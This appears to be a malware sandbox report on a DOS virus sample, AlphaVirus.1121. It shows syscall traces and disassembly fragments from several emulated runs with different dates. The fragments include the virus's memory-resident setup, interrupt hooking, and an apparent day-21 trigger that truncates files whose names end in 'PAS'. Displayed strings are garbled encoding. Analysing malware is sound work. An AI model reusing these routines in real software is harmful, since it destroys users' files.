Sample viewer

vx.netlux.org/Virus.DOS.AlphaVirus.1121


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:16:18.186293713Z 53 PC: 1347e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:16:18.188307148Z 42 PC: 13493 | Get date
0x13493: cmp dh, 0xa
0x13496: je 0x134d5
0x13498: mov ah, 0x62
0x1349a: int 0x21
0x1349c: dec bx
0x1349d: mov es, bx
0x1349f: mov ax, word ptr es:[3]
0x134a3: sub ax, 0xd6
0x134a6: inc bx
0x134a7: mov es, bx
0x134a9: mov bx, ax
0x134ab: mov ah, 0x4a
0x134ad: int 0x21
0x134af: mov bx, 0xd4
0x134b2: mov ah, 0x48
0x134b4: int 0x21
0x134b6: mov es, ax
0x134b8: mov si, 0
0x134bb: mov di, si
0x134bd: mov cx, 0x465
2018-12-17T23:16:18.19112843Z 98 PC: 1349c | Get current PSP
2018-12-17T23:16:18.19214425Z 74 PC: 134af | Reallocate memory
2018-12-17T23:16:18.194370945Z 72 PC: 134b6 | Allocate memory
2018-12-17T23:16:18.196171018Z 37 PC: 134d5 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:16:18.197429904Z 9 PC: 12a86 | Display string (String= ' ��⮢,�p�� ��ᬮ�p�� ����� �� �� ᬮ���� ����⠭����� ᢮�� �p��� Adinfo�. Press any key ... ')
2018-12-17T23:16:18.203019601Z 48 PC: 12a8f | Get DOS version
2018-12-17T23:16:18.204593098Z 42 PC: 9f13e | Get date
0x9f13e: cmp dl, 0x15
0x9f141: jne 0x9f17c
0x9f143: inc si
0x9f144: cmp byte ptr [si], 0
0x9f147: loopne 0x9f143
0x9f149: sub si, 3
0x9f14c: mov al, 0x50
0x9f14e: cmp byte ptr [si], al
0x9f150: jne 0x9f17c
0x9f152: mov al, 0x41
0x9f154: cmp byte ptr [si + 1], al
0x9f157: jne 0x9f17c
0x9f159: mov al, 0x53
0x9f15b: cmp byte ptr [si + 2], al
0x9f15e: jne 0x9f17c
0x9f160: mov ah, 0x3c
0x9f162: mov cx, 0
0x9f165: int 0x21
0x9f167: mov bx, ax
0x9f169: mov ax, cs
2018-12-17T23:16:18.206749882Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-17T23:16:18.21333012Z 93 PC: 12afe | File sharing functions
2018-12-17T23:16:18.216832955Z 9 PC: 12a86 | Display string (String= 'Size change=0469h/01129d. ')
2018-12-17T23:16:18.221018141Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17701,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:26.963353201Z 53 PC: 1347e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:26.965031607Z 42 PC: 13493 | Get date
0x13493: cmp dh, 0xa
0x13496: je 0x134d5
0x13498: mov ah, 0x62
0x1349a: int 0x21
0x1349c: dec bx
0x1349d: mov es, bx
0x1349f: mov ax, word ptr es:[3]
0x134a3: sub ax, 0xd6
0x134a6: inc bx
0x134a7: mov es, bx
0x134a9: mov bx, ax
0x134ab: mov ah, 0x4a
0x134ad: int 0x21
0x134af: mov bx, 0xd4
0x134b2: mov ah, 0x48
0x134b4: int 0x21
0x134b6: mov es, ax
0x134b8: mov si, 0
0x134bb: mov di, si
0x134bd: mov cx, 0x465
2018-12-25T12:56:26.968745842Z 98 PC: 1349c | Get current PSP
2018-12-25T12:56:26.969775291Z 74 PC: 134af | Reallocate memory
2018-12-25T12:56:26.97135856Z 72 PC: 134b6 | Allocate memory
2018-12-25T12:56:26.973731727Z 37 PC: 134d5 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:26.975460056Z 9 PC: 12a86 | Display string (String= ' ��⮢,�p�� ��ᬮ�p�� ����� �� �� ᬮ���� ����⠭����� ᢮�� �p��� Adinfo�. Press any key ... ')
2018-12-25T12:56:26.982767274Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:56:26.988350228Z 42 PC: 9f13e | Get date
0x9f13e: cmp dl, 0x15
0x9f141: jne 0x9f17c
0x9f143: inc si
0x9f144: cmp byte ptr [si], 0
0x9f147: loopne 0x9f143
0x9f149: sub si, 3
0x9f14c: mov al, 0x50
0x9f14e: cmp byte ptr [si], al
0x9f150: jne 0x9f17c
0x9f152: mov al, 0x41
0x9f154: cmp byte ptr [si + 1], al
0x9f157: jne 0x9f17c
0x9f159: mov al, 0x53
0x9f15b: cmp byte ptr [si + 2], al
0x9f15e: jne 0x9f17c
0x9f160: mov ah, 0x3c
0x9f162: mov cx, 0
0x9f165: int 0x21
0x9f167: mov bx, ax
0x9f169: mov ax, cs
2018-12-25T12:56:26.991149691Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:56:26.999112753Z 93 PC: 12afe | File sharing functions
2018-12-25T12:56:27.002614376Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:56:27.007126039Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17701,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:29.431553413Z 53 PC: 1347e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:29.434016579Z 42 PC: 13493 | Get date
0x13493: cmp dh, 0xa
0x13496: je 0x134d5
0x13498: mov ah, 0x62
0x1349a: int 0x21
0x1349c: dec bx
0x1349d: mov es, bx
0x1349f: mov ax, word ptr es:[3]
0x134a3: sub ax, 0xd6
0x134a6: inc bx
0x134a7: mov es, bx
0x134a9: mov bx, ax
0x134ab: mov ah, 0x4a
0x134ad: int 0x21
0x134af: mov bx, 0xd4
0x134b2: mov ah, 0x48
0x134b4: int 0x21
0x134b6: mov es, ax
0x134b8: mov si, 0
0x134bb: mov di, si
0x134bd: mov cx, 0x465
2018-12-25T12:56:29.440611029Z 9 PC: 12a86 | Display string (String= ' ��⮢,�p�� ��ᬮ�p�� ����� �� �� ᬮ���� ����⠭����� ᢮�� �p��� Adinfo�. Press any key ... ')
2018-12-25T12:56:29.444970478Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:56:29.446626416Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:56:29.451472712Z 93 PC: 12afe | File sharing functions
2018-12-25T12:56:29.453384392Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:56:29.458683264Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17701,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:29.502251002Z 53 PC: 1347e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:29.504496053Z 42 PC: 13493 | Get date
0x13493: cmp dh, 0xa
0x13496: je 0x134d5
0x13498: mov ah, 0x62
0x1349a: int 0x21
0x1349c: dec bx
0x1349d: mov es, bx
0x1349f: mov ax, word ptr es:[3]
0x134a3: sub ax, 0xd6
0x134a6: inc bx
0x134a7: mov es, bx
0x134a9: mov bx, ax
0x134ab: mov ah, 0x4a
0x134ad: int 0x21
0x134af: mov bx, 0xd4
0x134b2: mov ah, 0x48
0x134b4: int 0x21
0x134b6: mov es, ax
0x134b8: mov si, 0
0x134bb: mov di, si
0x134bd: mov cx, 0x465
2018-12-25T12:56:29.507306545Z 98 PC: 1349c | Get current PSP
2018-12-25T12:56:29.508581705Z 74 PC: 134af | Reallocate memory
2018-12-25T12:56:29.51123743Z 72 PC: 134b6 | Allocate memory
2018-12-25T12:56:29.513558065Z 37 PC: 134d5 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:29.515249984Z 9 PC: 12a86 | Display string (String= ' ��⮢,�p�� ��ᬮ�p�� ����� �� �� ᬮ���� ����⠭����� ᢮�� �p��� Adinfo�. Press any key ... ')
2018-12-25T12:56:29.522853517Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:56:29.52534962Z 42 PC: 9f13e | Get date
0x9f13e: cmp dl, 0x15
0x9f141: jne 0x9f17c
0x9f143: inc si
0x9f144: cmp byte ptr [si], 0
0x9f147: loopne 0x9f143
0x9f149: sub si, 3
0x9f14c: mov al, 0x50
0x9f14e: cmp byte ptr [si], al
0x9f150: jne 0x9f17c
0x9f152: mov al, 0x41
0x9f154: cmp byte ptr [si + 1], al
0x9f157: jne 0x9f17c
0x9f159: mov al, 0x53
0x9f15b: cmp byte ptr [si + 2], al
0x9f15e: jne 0x9f17c
0x9f160: mov ah, 0x3c
0x9f162: mov cx, 0
0x9f165: int 0x21
0x9f167: mov bx, ax
0x9f169: mov ax, cs
2018-12-25T12:56:29.527931727Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:56:29.535425305Z 93 PC: 12afe | File sharing functions
2018-12-25T12:56:29.539015121Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:56:29.544100006Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":21,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17701,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:30.569118152Z 53 PC: 1347e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:30.571706877Z 42 PC: 13493 | Get date
0x13493: cmp dh, 0xa
0x13496: je 0x134d5
0x13498: mov ah, 0x62
0x1349a: int 0x21
0x1349c: dec bx
0x1349d: mov es, bx
0x1349f: mov ax, word ptr es:[3]
0x134a3: sub ax, 0xd6
0x134a6: inc bx
0x134a7: mov es, bx
0x134a9: mov bx, ax
0x134ab: mov ah, 0x4a
0x134ad: int 0x21
0x134af: mov bx, 0xd4
0x134b2: mov ah, 0x48
0x134b4: int 0x21
0x134b6: mov es, ax
0x134b8: mov si, 0
0x134bb: mov di, si
0x134bd: mov cx, 0x465
2018-12-25T12:56:30.574692633Z 98 PC: 1349c | Get current PSP
2018-12-25T12:56:30.576097726Z 74 PC: 134af | Reallocate memory
2018-12-25T12:56:30.578040354Z 72 PC: 134b6 | Allocate memory
2018-12-25T12:56:30.580727244Z 37 PC: 134d5 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:30.582430314Z 9 PC: 12a86 | Display string (String= ' ��⮢,�p�� ��ᬮ�p�� ����� �� �� ᬮ���� ����⠭����� ᢮�� �p��� Adinfo�. Press any key ... ')
2018-12-25T12:56:30.588904642Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:56:30.591366598Z 42 PC: 9f13e | Get date
0x9f13e: cmp dl, 0x15
0x9f141: jne 0x9f17c
0x9f143: inc si
0x9f144: cmp byte ptr [si], 0
0x9f147: loopne 0x9f143
0x9f149: sub si, 3
0x9f14c: mov al, 0x50
0x9f14e: cmp byte ptr [si], al
0x9f150: jne 0x9f17c
0x9f152: mov al, 0x41
0x9f154: cmp byte ptr [si + 1], al
0x9f157: jne 0x9f17c
0x9f159: mov al, 0x53
0x9f15b: cmp byte ptr [si + 2], al
0x9f15e: jne 0x9f17c
0x9f160: mov ah, 0x3c
0x9f162: mov cx, 0
0x9f165: int 0x21
0x9f167: mov bx, ax
0x9f169: mov ax, cs
2018-12-25T12:56:30.5940385Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:56:30.601968499Z 93 PC: 12afe | File sharing functions
2018-12-25T12:56:30.605460951Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:56:30.610628458Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')